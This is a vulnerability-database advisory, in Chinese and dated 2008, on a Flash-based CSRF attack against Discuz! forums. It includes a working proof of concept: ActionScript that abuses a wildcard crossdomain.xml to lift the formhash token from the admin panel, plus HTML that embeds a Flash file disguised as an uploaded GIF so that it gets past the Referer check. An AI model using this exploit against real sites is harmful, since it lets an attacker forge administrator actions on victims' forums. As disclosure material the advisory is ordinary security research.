Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:4390
HistoryNov 04, 2008 - 12:00 a.m.

Discuz! flash csrf vul

2008-11-0400:00:00
Root
www.seebug.org
19
JSON

Discuz!的安全人员已经意识到csrf方面的漏洞了采用了formhash及判断Referer等来防止外部提交,如果看过<Bypass Preventing CSRF>[1]一文的朋友应该意识到我们可以通过flash来进行csrf攻击.

首先我们看Discuz!6开始自带了crossdomain.xml文件,代码如下:

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

允许容易域的访问,对于Discuz!的formhash我们可以通过as来处理得到如下代码:

import RegExp;
var xml:XML = new XML();
xml.onData = function(s) {
tb1.text = getFirstMatch(new RegExp("<input type=&quot;hidden&quot; name=&quot;formhash&quot; value=&quot;(\w+)&quot; />", "ig"), s, 1);
}
System.security.loadPolicyFile("http://192.168.1.102/crossdomain.xml&quot;);
xml.load("http://192.168.1.102/d.txt&quot;);

熟悉as安全的人知道,flash已经修补了http头定义的漏洞,也就是说我们没有办法利用下面的代码:

.addRequestHeader("Referer: http://foo/index.php?foo&quot;,&quot;www.80vul.com&quot;);

来伪造Referer,但是我们可以通过类似于SODB-2008-01里的利用通过把flash改为gif后缀上传到目标来突破,然后我们通过html远程调用这个gif来突破.

2008-03
[删除crossdomain.xml不可以完全修补该漏洞,crossdomain.xml可以为容易文件名loadPolicyFile()调用就行,所以攻击者可以通过上传等上传改名了的crossdomain.xml]


                                                POC[测试Discuz!5.5 其他版本的请自己编写]如下:

flash的原文件:http://www.80vul.com/dzvul/sodb/01/sodb-2008-02.fla

as代码如下:

import RegExp;
System.security.loadPolicyFile(&quot;http://www.80vul.com/bbs/crossdomain.xml&quot;);


var xml:XML = new XML();
xml.onData = function(s) {
    tb1.text =  getFirstMatch(new RegExp(&quot;&lt;input type=\&quot;hidden\&quot; name=\&quot;formhash\&quot; value=\&quot;(\\w+)\&quot; /&gt;&quot;, &quot;ig&quot;), s, 1);
}
System.security.loadPolicyFile(&quot;http://www.80vul.com/bbs/crossdomain.xml&quot;);
xml.load(&quot;http://www.80vul.com/bbs/admincp.php?action=members&quot;);

function getFirstMatch(re, s, i) {
	var m = null;
	if ((m = re.exec(s)) != null) {
		return m[i];
	}
}



远程调用的html:

&lt;object classid=&quot;clsid:d27cdb6e-ae6d-11cf-96b8-444553540000&quot; codebase=&quot;http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0&quot; width=&quot;550&quot; height=&quot;400&quot;&gt;&lt;param name=&quot;allowScriptAccess&quot; value=&quot;sameDomain&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.80vul.com/bbs/attachments/month_0810/20081030_a293d131d2da23ead5805QYWvs5tkBpi.gif&quot;&gt;&lt;param name=&quot;quality&quot; value=&quot;high&quot;&gt;&lt;param name=&quot;bgcolor&quot; value=&quot;#ffffff&quot;&gt;&lt;embed src=&quot;http://www.80vul.com/bbs/attachments/month_0810/20081030_a293d131d2da23ead5805QYWvs5tkBpi.gif&quot; quality=&quot;high&quot; bgcolor=&quot;#ffffff&quot; allowscriptaccess=&quot;sameDomain&quot; type=&quot;application/x-shockwave-flash&quot; pluginspage=&quot;http://www.macromedia.com/go/getflashplayer&quot; width=&quot;550&quot; height=&quot;400&quot;&gt;&lt;/object&gt;
JSON